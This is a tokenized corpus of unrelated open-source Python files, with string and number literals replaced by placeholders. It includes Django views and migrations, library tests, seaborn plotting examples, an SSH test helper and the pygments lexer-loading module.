<s> """<STR_LIT>""" <EOL> import math <EOL> try : <EOL> import itertools <EOL> combinations = itertools . combinations <EOL> except AttributeError : <EOL> def combinations ( seq , r = None ) : <EOL> """<STR_LIT>""" <EOL> if r == None : <EOL> r = len ( seq ) <EOL> if r <= <NUM_LIT:0> : <EOL> yield [ ] <EOL> else : <EOL> for i in xrange ( len ( seq ) ) : <EOL> for cc in combinations ( seq [ i + <NUM_LIT:1> : ] , r - <NUM_LIT:1> ) : <EOL> yield [ seq [ i ] ] + cc <EOL> try : <EOL> factorial = math . factorial <EOL> except AttributeError : <EOL> def factorial ( x ) : <EOL> n = abs ( int ( x ) ) <EOL> if n < <NUM_LIT:1> : <EOL> n = <NUM_LIT:1> <EOL> x = <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:1> , n + <NUM_LIT:1> ) : <EOL> x = i * x <EOL> return x </s>
<s> import sys <EOL> import plyj . parser <EOL> import plyj . model as m <EOL> p = plyj . parser . Parser ( ) <EOL> tree = p . parse_file ( sys . argv [ <NUM_LIT:1> ] ) <EOL> class MyVisitor ( m . Visitor ) : <EOL> def __init__ ( self ) : <EOL> super ( MyVisitor , self ) . __init__ ( ) <EOL> self . first_field = True <EOL> self . first_method = True <EOL> def visit_ClassDeclaration ( self , class_decl ) : <EOL> return self . visit_type_declaration ( class_decl ) <EOL> def visit_InterfaceDeclaration ( self , interface_decl ) : <EOL> return self . visit_type_declaration ( interface_decl ) <EOL> def visit_type_declaration ( self , type_decl ) : <EOL> print ( str ( type_decl . name ) ) <EOL> if type_decl . extends is not None : <EOL> print ( '<STR_LIT>' + type_decl . extends . name . value ) <EOL> if len ( type_decl . implements ) is not <NUM_LIT:0> : <EOL> print ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( [ type . name . value for type in type_decl . implements ] ) ) <EOL> print <EOL> return True <EOL> def visit_FieldDeclaration ( self , field_decl ) : <EOL> if self . first_field : <EOL> print ( '<STR_LIT>' ) <EOL> self . first_field = False <EOL> for var_decl in field_decl . variable_declarators : <EOL> if type ( field_decl . type ) is str : <EOL> type_name = field_decl . type <EOL> else : <EOL> type_name = field_decl . type . name . value <EOL> print ( '<STR_LIT:U+0020>' + type_name + '<STR_LIT:U+0020>' + var_decl . variable . name ) <EOL> def visit_MethodDeclaration ( self , method_decl ) : <EOL> if self . first_method : <EOL> print <EOL> print ( '<STR_LIT>' ) <EOL> self . first_method = False <EOL> param_strings = [ ] <EOL> for param in method_decl . parameters : <EOL> if type ( param . type ) is str : <EOL> param_strings . append ( param . type + '<STR_LIT:U+0020>' + param . variable . name ) <EOL> else : <EOL> param_strings . append ( param . type . name . value + '<STR_LIT:U+0020>' + param . variable . 
name ) <EOL> print ( '<STR_LIT:U+0020>' + method_decl . name + '<STR_LIT:(>' + '<STR_LIT:U+002CU+0020>' . join ( param_strings ) + '<STR_LIT:)>' ) <EOL> return True <EOL> def visit_VariableDeclaration ( self , var_declaration ) : <EOL> for var_decl in var_declaration . variable_declarators : <EOL> if type ( var_declaration . type ) is str : <EOL> type_name = var_declaration . type <EOL> else : <EOL> type_name = var_declaration . type . name . value <EOL> print ( '<STR_LIT:U+0020>' + type_name + '<STR_LIT:U+0020>' + var_decl . variable . name ) <EOL> print ( '<STR_LIT>' ) <EOL> tree . accept ( MyVisitor ( ) ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import django . utils . timezone <EOL> import model_utils . fields <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoCreatedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT>' , model_utils . fields . AutoLastModifiedField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' , editable = False ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:200> , unique = True ) ) , <EOL> ( '<STR_LIT:description>' , models . CharField ( default = '<STR_LIT>' , max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> from django import template <EOL> register = template . Library ( ) <EOL> @ register . filter <EOL> def is_owner_of ( user , repository ) : <EOL> return repository . check_user_role ( user , [ '<STR_LIT>' ] ) </s>
<s> from zeep . client import Client </s>
<s> from lxml import etree <EOL> from zeep . xsd import Schema <EOL> def test_parse_response ( ) : <EOL> schema_node = etree . fromstring ( b"""<STR_LIT>""" . strip ( ) ) <EOL> response_node = etree . fromstring ( b"""<STR_LIT>""" . strip ( ) ) <EOL> schema = Schema ( schema_node . find ( '<STR_LIT>' ) ) <EOL> assert schema <EOL> response_type = schema . get_element ( <EOL> '<STR_LIT>' ) <EOL> nsmap = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> node = response_node . find ( '<STR_LIT>' , namespaces = nsmap ) <EOL> assert node is not None <EOL> obj = response_type . parse ( node ) <EOL> assert obj . ZeepExampleResult . SomeValue == <NUM_LIT> <EOL> assert len ( obj . ZeepExampleResult . Results . Item ) == <NUM_LIT:2> <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:0> ] . Key == '<STR_LIT>' <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:0> ] . Value == <NUM_LIT:10> <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:1> ] . Key == '<STR_LIT>' <EOL> assert obj . ZeepExampleResult . Results . Item [ <NUM_LIT:1> ] . Value == <NUM_LIT:20> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import unittest <EOL> from mock import patch <EOL> from watchman . utils import get_cache , get_checks <EOL> class TestWatchman ( unittest . TestCase ) : <EOL> def assertListsEqual ( self , list1 , list2 ) : <EOL> try : <EOL> self . assertCountEqual ( list1 , list2 ) <EOL> except AttributeError : <EOL> self . assertItemsEqual ( list1 , list2 ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_cache ( self , cache_mock ) : <EOL> cache_key = '<STR_LIT>' <EOL> cache_value = '<STR_LIT>' <EOL> cache = { cache_key : cache_value } <EOL> def getitem ( cache_name ) : <EOL> return cache [ cache_name ] <EOL> cache_mock . caches . __getitem__ . side_effect = getitem <EOL> result = get_cache ( cache_key ) <EOL> self . assertEqual ( result , cache_value ) <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_cache_less_than_django_17 ( self , django_mock , get_cache_mock ) : <EOL> django_mock . VERSION = ( <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:6> , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> get_cache ( '<STR_LIT:foo>' ) <EOL> get_cache_mock . assert_called_once_with ( '<STR_LIT:foo>' ) <EOL> def test_get_checks_returns_all_available_checks_by_default ( self ) : <EOL> checks = [ check . __name__ for check in get_checks ( ) ] <EOL> expected_checks = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_check_list_returns_union ( self ) : <EOL> check_list = [ '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( check_list = check_list ) ] <EOL> expected_checks = [ '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_skip_list_returns_difference ( self ) : <EOL> skip_list = [ '<STR_LIT>' ] <EOL> checks = [ check . 
__name__ for check in get_checks ( skip_list = skip_list ) ] <EOL> expected_checks = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_matching_check_and_skip_list_returns_empty_list ( self ) : <EOL> check_list , skip_list = [ '<STR_LIT>' ] , [ '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( check_list = check_list , skip_list = skip_list ) ] <EOL> expected_checks = [ ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_check_and_skip_list ( self ) : <EOL> check_list = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> skip_list = [ '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( check_list = check_list , skip_list = skip_list ) ] <EOL> expected_checks = [ '<STR_LIT>' ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> def test_get_checks_with_paid_checks_disabled_returns_expected_checks ( self ) : <EOL> expected_checks = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> checks = [ check . __name__ for check in get_checks ( ) ] <EOL> self . assertListsEqual ( checks , expected_checks ) <EOL> @ unittest . skip ( "<STR_LIT>" ) <EOL> def test_get_checks_with_paid_checks_enabled_returns_expected_checks ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import seaborn as sns <EOL> sns . set ( style = "<STR_LIT>" ) <EOL> df = sns . load_dataset ( "<STR_LIT>" ) <EOL> sns . lmplot ( x = "<STR_LIT:x>" , y = "<STR_LIT:y>" , col = "<STR_LIT>" , hue = "<STR_LIT>" , data = df , <EOL> col_wrap = <NUM_LIT:2> , ci = None , palette = "<STR_LIT>" , size = <NUM_LIT:4> , <EOL> scatter_kws = { "<STR_LIT:s>" : <NUM_LIT:50> , "<STR_LIT>" : <NUM_LIT:1> } ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import seaborn as sns <EOL> sns . set ( style = "<STR_LIT>" ) <EOL> rs = np . random . RandomState ( <NUM_LIT:7> ) <EOL> x = rs . normal ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT> ) <EOL> y = <NUM_LIT:2> + <NUM_LIT> * x + rs . normal ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ) <EOL> sns . residplot ( x , y , lowess = True , color = "<STR_LIT:g>" ) </s>
<s> import nose . tools as nt <EOL> import numpy . testing as npt <EOL> import matplotlib . pyplot as plt <EOL> from . import PlotTestCase <EOL> from . . import miscplot as misc <EOL> from seaborn import color_palette <EOL> class TestPalPlot ( PlotTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_palplot_size ( self ) : <EOL> pal4 = color_palette ( "<STR_LIT>" , <NUM_LIT:4> ) <EOL> misc . palplot ( pal4 ) <EOL> size4 = plt . gcf ( ) . get_size_inches ( ) <EOL> nt . assert_equal ( tuple ( size4 ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) ) <EOL> pal5 = color_palette ( "<STR_LIT>" , <NUM_LIT:5> ) <EOL> misc . palplot ( pal5 ) <EOL> size5 = plt . gcf ( ) . get_size_inches ( ) <EOL> nt . assert_equal ( tuple ( size5 ) , ( <NUM_LIT:5> , <NUM_LIT:1> ) ) <EOL> palbig = color_palette ( "<STR_LIT>" , <NUM_LIT:3> ) <EOL> misc . palplot ( palbig , <NUM_LIT:2> ) <EOL> sizebig = plt . gcf ( ) . get_size_inches ( ) <EOL> nt . assert_equal ( tuple ( sizebig ) , ( <NUM_LIT:6> , <NUM_LIT:2> ) ) </s>
<s> from __future__ import print_function <EOL> import unittest <EOL> import time <EOL> from mwclient . util import parse_timestamp <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( ) <EOL> class TestUtil ( unittest . TestCase ) : <EOL> def test_parse_empty_timestamp ( self ) : <EOL> assert ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) == parse_timestamp ( '<STR_LIT>' ) <EOL> def test_parse_nonempty_timestamp ( self ) : <EOL> assert time . struct_time ( [ <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:2> , - <NUM_LIT:1> ] ) == parse_timestamp ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . . lists import flat_map <EOL> from . nodes import TextNode , Element , SelfClosingElement , ForceWrite , NodeVisitor <EOL> def text ( value ) : <EOL> return TextNode ( value ) <EOL> def element ( tag_names , attributes = None , children = None , collapsible = False ) : <EOL> if not isinstance ( tag_names , list ) : <EOL> tag_names = [ tag_names ] <EOL> if attributes is None : <EOL> attributes = { } <EOL> if children is None : <EOL> children = [ ] <EOL> return Element ( tag_names , attributes , children , collapsible = collapsible ) <EOL> def collapsible_element ( tag_names , attributes = None , children = None ) : <EOL> return element ( tag_names , attributes , children , collapsible = True ) <EOL> def self_closing_element ( tag_name , attributes = None ) : <EOL> if attributes is None : <EOL> attributes = { } <EOL> return SelfClosingElement ( tag_name , attributes ) <EOL> force_write = ForceWrite ( ) <EOL> def strip_empty ( nodes ) : <EOL> return flat_map ( _strip_empty_node , nodes ) <EOL> def _strip_empty_node ( node ) : <EOL> return StripEmpty ( ) . visit ( node ) <EOL> class StripEmpty ( NodeVisitor ) : <EOL> def visit_text_node ( self , node ) : <EOL> if node . value : <EOL> return [ node ] <EOL> else : <EOL> return [ ] <EOL> def visit_element ( self , element ) : <EOL> children = strip_empty ( element . children ) <EOL> if len ( children ) == <NUM_LIT:0> : <EOL> return [ ] <EOL> else : <EOL> return [ Element ( <EOL> element . tag_names , <EOL> element . attributes , <EOL> children , <EOL> collapsible = element . 
collapsible ) ] <EOL> def visit_self_closing_element ( self , element ) : <EOL> return [ element ] <EOL> def visit_force_write ( self , node ) : <EOL> return [ node ] <EOL> def collapse ( nodes ) : <EOL> collapsed = [ ] <EOL> for node in nodes : <EOL> _collapsing_add ( collapsed , node ) <EOL> return collapsed <EOL> class _CollapseNode ( NodeVisitor ) : <EOL> def visit_text_node ( self , node ) : <EOL> return node <EOL> def visit_element ( self , element ) : <EOL> return Element ( <EOL> element . tag_names , <EOL> element . attributes , <EOL> collapse ( element . children ) , <EOL> collapsible = element . collapsible ) <EOL> def visit_self_closing_element ( self , element ) : <EOL> return element <EOL> def visit_force_write ( self , node ) : <EOL> return node <EOL> _collapse_node = _CollapseNode ( ) . visit <EOL> def _collapsing_add ( collapsed , node ) : <EOL> collapsed_node = _collapse_node ( node ) <EOL> if not _try_collapse ( collapsed , collapsed_node ) : <EOL> collapsed . append ( collapsed_node ) <EOL> def _try_collapse ( collapsed , node ) : <EOL> if not collapsed : <EOL> return False <EOL> last = collapsed [ - <NUM_LIT:1> ] <EOL> if not isinstance ( last , Element ) or not isinstance ( node , Element ) : <EOL> return False <EOL> if not node . collapsible : <EOL> return False <EOL> if not _is_match ( last , node ) : <EOL> return False <EOL> for child in node . children : <EOL> _collapsing_add ( last . children , child ) <EOL> return True <EOL> def _is_match ( first , second ) : <EOL> return first . tag_name in second . tag_names and first . attributes == second . attributes <EOL> def write ( writer , nodes ) : <EOL> visitor = _NodeWriter ( writer ) <EOL> visitor . visit_all ( nodes ) <EOL> class _NodeWriter ( NodeVisitor ) : <EOL> def __init__ ( self , writer ) : <EOL> self . _writer = writer <EOL> def visit_text_node ( self , node ) : <EOL> self . _writer . text ( node . value ) <EOL> def visit_element ( self , element ) : <EOL> self . _writer . 
start ( element . tag_name , element . attributes ) <EOL> self . visit_all ( element . children ) <EOL> self . _writer . end ( element . tag_name ) <EOL> def visit_self_closing_element ( self , element ) : <EOL> self . _writer . self_closing ( element . tag_name , element . attributes ) <EOL> def visit_force_write ( self , element ) : <EOL> pass <EOL> def visit_all ( self , nodes ) : <EOL> for node in nodes : <EOL> self . visit ( node ) </s>
<s> from __future__ import unicode_literals <EOL> import io <EOL> from nose . tools import istest , assert_equal <EOL> from mammoth . docx import xmlparser as xml , office_xml <EOL> @ istest <EOL> def alternate_content_is_replaced_by_contents_of_fallback ( ) : <EOL> xml_string = ( <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> result = office_xml . read ( io . StringIO ( xml_string ) ) <EOL> assert_equal ( [ xml . element ( "<STR_LIT>" ) ] , result . children ) </s>
<s> import os <EOL> import spur <EOL> import spur . ssh <EOL> def create_ssh_shell ( missing_host_key = None , shell_type = None ) : <EOL> port_var = os . environ . get ( "<STR_LIT>" ) <EOL> port = int ( port_var ) if port_var is not None else None <EOL> return spur . SshShell ( <EOL> hostname = os . environ . get ( "<STR_LIT>" , "<STR_LIT:127.0.0.1>" ) , <EOL> username = os . environ [ "<STR_LIT>" ] , <EOL> password = os . environ [ "<STR_LIT>" ] , <EOL> port = port , <EOL> missing_host_key = ( missing_host_key or spur . ssh . MissingHostKey . accept ) , <EOL> shell_type = shell_type , <EOL> ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> def read ( fname ) : <EOL> return open ( os . path . join ( os . path . dirname ( __file__ ) , fname ) ) . read ( ) <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = find_packages ( '<STR_LIT:src>' ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . template . defaultfilters import slugify <EOL> from django . core . paginator import Paginator , InvalidPage , EmptyPage <EOL> from django . http import Http404 , HttpResponseForbidden , HttpResponseServerError , HttpResponseRedirect <EOL> from django . shortcuts import render_to_response <EOL> from django . template import RequestContext <EOL> from contacts . models import Group <EOL> from contacts . forms import GroupCreateForm , GroupUpdateForm <EOL> def list ( request , page = <NUM_LIT:1> , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> group_list = Group . objects . all ( ) <EOL> paginator = Paginator ( group_list , <NUM_LIT:20> ) <EOL> try : <EOL> groups = paginator . page ( page ) <EOL> except ( EmptyPage , InvalidPage ) : <EOL> groups = paginator . page ( paginator . num_pages ) <EOL> kwvars = { <EOL> '<STR_LIT>' : groups . object_list , <EOL> '<STR_LIT>' : groups . has_next ( ) , <EOL> '<STR_LIT>' : groups . has_previous ( ) , <EOL> '<STR_LIT>' : groups . has_other_pages ( ) , <EOL> '<STR_LIT>' : groups . start_index ( ) , <EOL> '<STR_LIT>' : groups . end_index ( ) , <EOL> } <EOL> try : <EOL> kwvars [ '<STR_LIT>' ] = groups . previous_page_number ( ) <EOL> except ( EmptyPage , InvalidPage ) : <EOL> kwvars [ '<STR_LIT>' ] = None <EOL> try : <EOL> kwvars [ '<STR_LIT>' ] = groups . next_page_number ( ) <EOL> except ( EmptyPage , InvalidPage ) : <EOL> kwvars [ '<STR_LIT>' ] = None <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def detail ( request , pk , slug = None , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> group = Group . objects . get ( pk__iexact = pk ) <EOL> except Group . 
DoesNotExist : <EOL> raise Http404 <EOL> kwvars = { <EOL> '<STR_LIT:object>' : group , <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def create ( request , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> user = request . user <EOL> if not user . has_perm ( '<STR_LIT>' ) : <EOL> return HttpResponseForbidden ( ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> group_form = GroupCreateForm ( request . POST ) <EOL> if group_form . is_valid ( ) : <EOL> g = group_form . save ( commit = False ) <EOL> g . slug = slugify ( g . name ) <EOL> g . save ( ) <EOL> return HttpResponseRedirect ( g . get_absolute_url ( ) ) <EOL> else : <EOL> return HttpResponseServerError <EOL> kwvars = { <EOL> '<STR_LIT>' : GroupCreateForm ( request . POST ) <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def update ( request , pk , slug = None , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> user = request . user <EOL> if not user . has_perm ( '<STR_LIT>' ) : <EOL> return HttpResponseForbidden ( ) <EOL> try : <EOL> group = Group . objects . get ( pk__iexact = pk ) <EOL> except Group . DoesNotExist : <EOL> raise Http404 <EOL> form = GroupUpdateForm ( instance = group ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = GroupUpdateForm ( request . POST , instance = group ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return HttpResponseRedirect ( group . get_absolute_url ( ) ) <EOL> kwvars = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT:object>' : group , <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def delete ( request , pk , slug = None , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> user = request . user <EOL> if not user . has_perm ( '<STR_LIT>' ) : <EOL> return HttpResponseForbidden ( ) <EOL> try : <EOL> group = Group . objects . get ( pk__iexact = pk ) <EOL> except Group . 
DoesNotExist : <EOL> raise Http404 <EOL> if request . method == '<STR_LIT:POST>' : <EOL> new_data = request . POST . copy ( ) <EOL> if new_data [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> group . delete ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> return HttpResponseRedirect ( group . get_absolute_url ( ) ) <EOL> kwvars = { <EOL> '<STR_LIT:object>' : group , <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import types <EOL> import fnmatch <EOL> from os . path import basename <EOL> from pygments . lexers . _mapping import LEXERS <EOL> from pygments . modeline import get_filetype_from_buffer <EOL> from pygments . plugin import find_plugin_lexers <EOL> from pygments . util import ClassNotFound , bytes <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] + LEXERS . keys ( ) <EOL> _lexer_cache = { } <EOL> def _load_lexers ( module_name ) : <EOL> """<STR_LIT>""" <EOL> mod = __import__ ( module_name , None , None , [ '<STR_LIT>' ] ) <EOL> for lexer_name in mod . __all__ : <EOL> cls = getattr ( mod , lexer_name ) <EOL> _lexer_cache [ cls . name ] = cls <EOL> def get_all_lexers ( ) : <EOL> """<STR_LIT>""" <EOL> for item in LEXERS . itervalues ( ) : <EOL> yield item [ <NUM_LIT:1> : ] <EOL> for lexer in find_plugin_lexers ( ) : <EOL> yield lexer . name , lexer . aliases , lexer . filenames , lexer . mimetypes <EOL> def find_lexer_class ( name ) : <EOL> """<STR_LIT>""" <EOL> if name in _lexer_cache : <EOL> return _lexer_cache [ name ] <EOL> for module_name , lname , aliases , _ , _ in LEXERS . itervalues ( ) : <EOL> if name == lname : <EOL> _load_lexers ( module_name ) <EOL> return _lexer_cache [ name ] <EOL> for cls in find_plugin_lexers ( ) : <EOL> if cls . name == name : <EOL> return cls <EOL> def get_lexer_by_name ( _alias , ** options ) : <EOL> """<STR_LIT>""" <EOL> for module_name , name , aliases , _ , _ in LEXERS . itervalues ( ) : <EOL> if _alias in aliases : <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( module_name ) <EOL> return _lexer_cache [ name ] ( ** options ) <EOL> for cls in find_plugin_lexers ( ) : <EOL> if _alias in cls . 
aliases : <EOL> return cls ( ** options ) <EOL> raise ClassNotFound ( '<STR_LIT>' % _alias ) <EOL> def get_lexer_for_filename ( _fn , code = None , ** options ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> fn = basename ( _fn ) <EOL> for modname , name , _ , filenames , _ in LEXERS . itervalues ( ) : <EOL> for filename in filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( modname ) <EOL> matches . append ( ( _lexer_cache [ name ] , filename ) ) <EOL> for cls in find_plugin_lexers ( ) : <EOL> for filename in cls . filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> matches . append ( ( cls , filename ) ) <EOL> if sys . version_info > ( <NUM_LIT:3> , ) and isinstance ( code , bytes ) : <EOL> code = code . decode ( '<STR_LIT>' ) <EOL> def get_rating ( info ) : <EOL> cls , filename = info <EOL> bonus = '<STR_LIT:*>' not in filename and <NUM_LIT:0.5> or <NUM_LIT:0> <EOL> if code : <EOL> return cls . analyse_text ( code ) + bonus <EOL> return cls . priority + bonus <EOL> if matches : <EOL> matches . sort ( key = get_rating ) <EOL> return matches [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] ( ** options ) <EOL> raise ClassNotFound ( '<STR_LIT>' % _fn ) <EOL> def get_lexer_for_mimetype ( _mime , ** options ) : <EOL> """<STR_LIT>""" <EOL> for modname , name , _ , _ , mimetypes in LEXERS . itervalues ( ) : <EOL> if _mime in mimetypes : <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( modname ) <EOL> return _lexer_cache [ name ] ( ** options ) <EOL> for cls in find_plugin_lexers ( ) : <EOL> if _mime in cls . 
mimetypes : <EOL> return cls ( ** options ) <EOL> raise ClassNotFound ( '<STR_LIT>' % _mime ) <EOL> def _iter_lexerclasses ( ) : <EOL> """<STR_LIT>""" <EOL> for key in sorted ( LEXERS ) : <EOL> module_name , name = LEXERS [ key ] [ : <NUM_LIT:2> ] <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( module_name ) <EOL> yield _lexer_cache [ name ] <EOL> for lexer in find_plugin_lexers ( ) : <EOL> yield lexer <EOL> def guess_lexer_for_filename ( _fn , _text , ** options ) : <EOL> """<STR_LIT>""" <EOL> fn = basename ( _fn ) <EOL> primary = None <EOL> matching_lexers = set ( ) <EOL> for lexer in _iter_lexerclasses ( ) : <EOL> for filename in lexer . filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> matching_lexers . add ( lexer ) <EOL> primary = lexer <EOL> for filename in lexer . alias_filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> matching_lexers . add ( lexer ) <EOL> if not matching_lexers : <EOL> raise ClassNotFound ( '<STR_LIT>' % fn ) <EOL> if len ( matching_lexers ) == <NUM_LIT:1> : <EOL> return matching_lexers . pop ( ) ( ** options ) <EOL> result = [ ] <EOL> for lexer in matching_lexers : <EOL> rv = lexer . analyse_text ( _text ) <EOL> if rv == <NUM_LIT:1.0> : <EOL> return lexer ( ** options ) <EOL> result . append ( ( rv , lexer ) ) <EOL> def type_sort ( type_ ) : <EOL> return ( type_ [ <NUM_LIT:0> ] , type_ [ <NUM_LIT:1> ] . __name__ ) <EOL> result . sort ( key = type_sort ) <EOL> if not result [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] and primary is not None : <EOL> return primary ( ** options ) <EOL> return result [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ( ** options ) <EOL> def guess_lexer ( _text , ** options ) : <EOL> """<STR_LIT>""" <EOL> ft = get_filetype_from_buffer ( _text ) <EOL> if ft is not None : <EOL> try : <EOL> return get_lexer_by_name ( ft , ** options ) <EOL> except ClassNotFound : <EOL> pass <EOL> best_lexer = [ <NUM_LIT:0.0> , None ] <EOL> for lexer in _iter_lexerclasses ( ) : <EOL> rv = lexer . 
analyse_text ( _text ) <EOL> if rv == <NUM_LIT:1.0> : <EOL> return lexer ( ** options ) <EOL> if rv > best_lexer [ <NUM_LIT:0> ] : <EOL> best_lexer [ : ] = ( rv , lexer ) <EOL> if not best_lexer [ <NUM_LIT:0> ] or best_lexer [ <NUM_LIT:1> ] is None : <EOL> raise ClassNotFound ( '<STR_LIT>' ) <EOL> return best_lexer [ <NUM_LIT:1> ] ( ** options ) <EOL> class _automodule ( types . ModuleType ) : <EOL> """<STR_LIT>""" <EOL> def __getattr__ ( self , name ) : <EOL> info = LEXERS . get ( name ) <EOL> if info : <EOL> _load_lexers ( info [ <NUM_LIT:0> ] ) <EOL> cls = _lexer_cache [ info [ <NUM_LIT:1> ] ] <EOL> setattr ( self , name , cls ) <EOL> return cls <EOL> raise AttributeError ( name ) <EOL> oldmod = sys . modules [ '<STR_LIT>' ] <EOL> newmod = _automodule ( '<STR_LIT>' ) <EOL> newmod . __dict__ . update ( oldmod . __dict__ ) <EOL> sys . modules [ '<STR_LIT>' ] = newmod <EOL> del newmod . newmod , newmod . oldmod , newmod . sys , newmod . types </s>
